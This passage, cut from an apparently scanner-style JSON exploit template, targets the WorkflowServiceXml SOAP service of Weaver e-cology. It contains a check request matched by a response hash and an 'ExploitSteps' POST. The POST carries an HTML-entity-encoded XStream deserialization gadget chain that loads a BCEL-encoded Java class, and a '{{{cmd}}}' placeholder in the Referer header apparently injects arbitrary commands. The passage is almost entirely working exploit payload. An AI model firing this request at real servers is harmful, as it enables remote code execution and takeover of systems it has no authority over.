x52;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x74;&#x68;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x2e;&#x3c;&#x2f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x64;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x65;&#x72;&#x54;&#x6f;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x4b;&#x45;&#x59;&#x53;&#x3c;&#x2f;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x42;&#x79;&#x74;&#x65;&#x41;&#x72;&#x72;&#x61;&#x79;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x62;&#x75;&#x66;&#x3e;&#x3c;&#x2f;&#x62;&#x75;&#x66;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x6f;&#x73;&#x3e;&#x30;&#x3c;&#x2f;&#x70;&#x6f;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x30;&#x3c;&#x2f;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x72;&#x61;&#x6e;&#x73;&#x66;&#x65;&#x72;&#x46;&#x6c;&#x61;&#x76;&#x6f;&#x72;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x30;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;</web:string>\n        <web:string>2</web:string>\n      </web:doCreateWorkflowRequest>\n   </soapenv:Body>\n</soapenv:Envelope>\n"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "62962DAA55198E163F6CC3F7E3F1A505",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "/services%20/WorkflowServiceXml",
        "follow_redirect": false,
        "header": {
          "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
          "Content-Type": "text/xml;charset=UTF-8",
          "Referer": "5c8ca382ae7a70a3c56e7d6c5f6603dc{{{cmd}}}"
        },
        "data_type": "text",
        "data": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <web:doCreateWorkflowRequest>    <web:string>&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x27;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x75;&#x6e;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x62;&#x6c;&#x65;&#x2d;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x32;&#x3c;&#x2f;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x70;&#x61;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x66;&#x78;&#x2e;&#x63;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x2e;&#x4f;&#x62;&#x73;&#x65;&#x72;&#x76;&#x61;&#x62;&#x6c;&#x65;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x31;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x74;&#x3e;&#x33;&#x3c;&#x2f;&#x69;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x77;&#x73;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x58;&#x4d;&#x4c;&#x4d;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x24;&#x58;&#x6d;&#x6c;&#x44;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x74;&#x65;&#x78;&#x74;&#x2f;&#x70;&#x6c;&#x61;&#x69;&#x6e;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x53;&#x65;&#x71;&#x75;&#x65;&#x6e;&#x63;&#x65;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x73;&#x77;&#x69;&#x6e;&#x67;&#x2e;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x24;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x45;&#x6e;&#x75;&#x6d;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x74;&#x6f;&#x6f;&#x6c;&#x73;&#x2e;&#x6a;&#x61;&#x76;&#x61;&#x63;&#x2e;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6e;&#x67;&#x2e;&#x4a;&#x61;&#x76;&#x61;&#x63;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6e;&#x67;&#x45;&#x6e;&#x76;&#x69;&#x72;&#x6f;&#x6e;&#x6d;&#x65;&#x6e;&#x74;&#x24;&#x4e;&#x61;&#x6d;&#x65;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x49;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x62;&#x73;&#x74;&#x72;&#x61;&#x63;&#x74;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x49;&#x74;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x2d;&#x31;&#x3c;&#x2f;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x72;&#x72;&#x61;&#x79;&#x73;&#x24;&#x41;&#x72;&#x72;&#x61;&#x79;&#x4c;&#x69;&#x73;&#x74;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x2d;&#x61;&#x72;&#x72;&#x61;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x24;&#x24;&#x42;&#x43;&#x45;&#x4c;&#x24;&#x24;&#x24;&#x6c;&#x24;&#x38;&#x62;&#x24;&#x49;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x38;&#x64;&#x55;&#x24;&#x65;&#x62;&#x53;&#x24;&#x54;&#x57;&#x24;&#x55;&#x24;&#x66;&#x66;&#x24;&#x7a;&#x24;&#x71;&#x24;&#x64;&#x63;&#x24;&#x63;&#x64;&#x24;&#x62;&#x32;&#x24;&#x49;&#x24;&#x45;&#x24;&#x51;&#x24;&#x61;&#x32;&#x55;&#x24;&#x62;&#x31;&#x24;&#x7a;&#x24;&#x67;&#x24;&#x45;&#x24;&#x53;&#x24;&#x4b;&#x24;&#x66;&#x32;&#x24;&#x4b;&#x24;&#x64;&#x36;&#x24;&#x38;&#x61;&#x24;&#x33;&#x63;&#x24;&#x77;&#x36;&#x24;&#x6d;&#x24;&#x72;&#x54;&#x24;&#x45;&#x6d;&#x24;&#x65;&#x64;&#x24;&#x62;&#x32;&#x24;&#x62;&#x39;&#x24;&#x63;&#x30;&#x42;&#x24;&#x64;&#x38;&#x24;&#x38;&#x64;&#x24;&#x66;&#x62;&#x24;&#x41;&#x24;&#x66;&#x61;&#x24;&#x37;&#x65;&#x24;&#x62;&#x66;&#x24;&#x39;&#x66;&#x33;&#x24;&#x66;&#x64;&#x24;&#x65;&#x34;&#x24;&#x6c;&#x24;&#x64;&#x30;&#x24;&#x66;&#x31;&#x24;&#x62;&#x33;&#x5f;&#x56;&#x24;&#x61;&#x37;&#x24;&#x39;&#x64;&#x76;&#x24;&#x33;&#x61;&#x24;&#x64;&#x33;&#x24;&#x5f;&#x4e;&#x24;&#x64;&#x62;&#x24;&#x50;&#x24;&#x65;&#x64;&#x24;&#x33;&#x66;&#x54;&#x7a;&#x24;&#x65;&#x65;&#x24;&#x73;&#x24;&#x49;&#x31;&#x24;&#x62;&#x34;&#x36;&#x24;&#x39;&#x39;&#x24;&#x62;&#x39;&#x24;&#x37;&#x62;&#x24;&#x63;&#x66;&#x24;&#x66;&#x33;&#x24;&#x66;&#x65;&#x24;&#x63;&#x65;&#x39;&#x24;&#x66;&#x37;&#x24;&#x39;&#x63;&#x24;&#x66;&#x62;&#x24;&#x64;&#x62;&#x24;&#x64;&#x66;&#x24;&#x33;&#x66;&#x24;&#x66;&#x63;&#x24;&#x4d;&#x24;&#x65;&#x30;&#x24;&#x79;&#x24;&#x62;&#x65;&#x55;&#x24;&#x51;&#x24;&#x63;&#x31;&#x24;&#x38;&#x30;&#x24;&#x38;&#x32;&#x41;&#x24;&#x4d;&#x24;&#x38;&#x39;&#x24;&#x72;&#x24;&#x72;&#x63;&#x58;&#x24;&#x63;&#x31;&#x39;&#x24;&#x33;&#x63;&#x24;&#x78;&#x24;&#x65;&#x33;&#x24;&#x33;&#x63;&#x24;&#x63;&#x33;&#x73;&#x24;&#x4b;&#x24;&#x59;&#x24;&#x24;&#x30;&#x24;&#x38;&#x63;&#x24;&#x75;&#x24;&#x62;&#x38;&#x24;&#x38;&#x38;&#x51;&#x24;&#x61;&#x31;&#x39;&#x24;&#x73;&#x38;&#x24;&#x65;&#x33;&#x32;&#x24;&#x73;&#x24;&#x63;&#x34;&#x24;&#x66;&#x37;&#x79;&#x24;&#x46;&#x24;&#x39;&#x37;&#x30;&#x24;&#x76;&#x24;&#x39;&#x36;&#x24;&#x63;&#x62;&#x32;&#x24;&#x35;&#x65;&#x24;&#x36;&#x30;&#x48;&#x24;&#x63;&#x62;&#x24;&#x39;&#x38;&#x62;&#x24;&#x39;&#x38;&#x24;&#x39;&#x36;&#x71;&#x45;&#x24;&#x63;&#x36;&#x24;&#x38;&#x63;&#x24;&#x38;&#x32;&#x46;&#x24;&#x62;&#x63;&#x24;&#x63;&#x38;&#x30;&#x24;&#x61;&#x62;&#x24;&#x6d;&#x24;&#x38;&#x33;&#x39;&#x41;&#x24;&#x62;&#x63;&#x24;&#x71;&#x76;&#x57;&#x24;&#x56;&#x24;&#x63;&#x63;&#x24;&#x65;&#x33;&#x24;&#x39;&#x61;&#x24;&#x38;&#x32;&#x24;&#x57;&#x24;&#x79;&#x24;&#x63;&#x38;&#x58;&#x24;&#x55;&#x24;&#x64;&#x66;&#x24;&#x65;&#x62;&#x62;&#x24;&#x62;&#x39;&#x24;&#x6e;&#x24;&#x39;&#x36;&#x24;&#x39;&#x37;&#x65;&#x24;&#x62;&#x63;&#x24;&#x61;&#x32;&#x24;&#x6d;&#x24;&#x38;&#x61;&#x24;&#x39;&#x62;&#x24;&#x4d;&#x24;&#x61;&#x66;&#x24;&#x77;&#x78;&#x24;&#x67;&#x24;&#x67;&#x24;&#x63;&#x33;&#x24;&#x39;&#x32;&#x24;&#x38;&#x34;&#x24;&#x61;&#x61;&#x73;&#x24;&#x38;&#x36;&#x69;&#x24;&#x62;&#x38;&#x24;&#x65;&#x37;&#x24;&#x72;&#x54;&#x24;&#x63;&#x36;&#x24;&#x64;&#x62;&#x24;&#x61;&#x66;&#x4a;&#x24;&#x49;&#x24;&#x38;&#x64;&#x5a;&#x59;&#x24;&#x24;&#x24;&#x61;&#x31;&#x36;&#x6d;&#x24;&#x39;&#x38;&#x24;&#x37;&#x63;&#x24;&#x64;&#x61;&#x24;&#x64;&#x62;&#x58;&#x24;&#x65;&#x32;&#x24;&#x66;&#x36;&#x24;&#x39;&#x63;&#x24;&#x62;&#x36;&#x24;&#x39;&#x34;&#x24;&#x70;&#x4e;&#x4d;&#x24;&#x63;&#x36;&#x24;&#x64;&#x35;&#x24;&#x66;&#x34;&#x24;&#x66;&#x35;&#x24;&#x76;&#x24;&#x7a;&#x24;&#x6c;&#x24;&#x64;&#x30;&#x64;&#x4a;&#x24;&#x66;&#x30;&#x24;&#x5a;&#x74;&#x24;&#x43;&#x24;&#x63;&#x66;&#x24;&#x39;&#x30;&#x24;&#x72;&#x6c;&#x24;&#x45;&#x24;&#x38;&#x63;&#x24;&#x64;&#x30;&#x24;&#x39;&#x30;&#x6b;&#x24;&#x4a;&#x4a;&#x24;&#x63;&#x36;&#x24;&#x66;&#x32;&#x6c;&#x24;&#x39;&#x64;&#x4f;&#x24;&#x59;&#x24;&#x63;&#x32;&#x4e;&#x24;&#x6b;&#x24;&#x62;&#x66;&#x36;&#x24;&#x39;&#x33;&#x58;&#x24;&#x64;&#x33;&#x36;&#x35;&#x24;&#x56;&#x24;&#x61;&#x37;&#x24;&#x52;&#x67;&#x24;&#x65;&#x30;&#x24;&#x77;&#x24;&#x39;&#x36;&#x24;&#x62;&#x31;&#x24;&#x61;&#x32;&#x62;&#x24;&#x56;&#x24;&#x38;&#x36;&#x24;&#x38;&#x34;&#x24;&#x64;&#x33;&#x24;&#x62;&#x61;&#x24;&#x62;&#x35;&#x24;&#x39;&#x31;&#x24;&#x64;&#x30;&#x35;&#x4f;&#x5f;&#x24;&#x62;&#x35;&#x24;&#x53;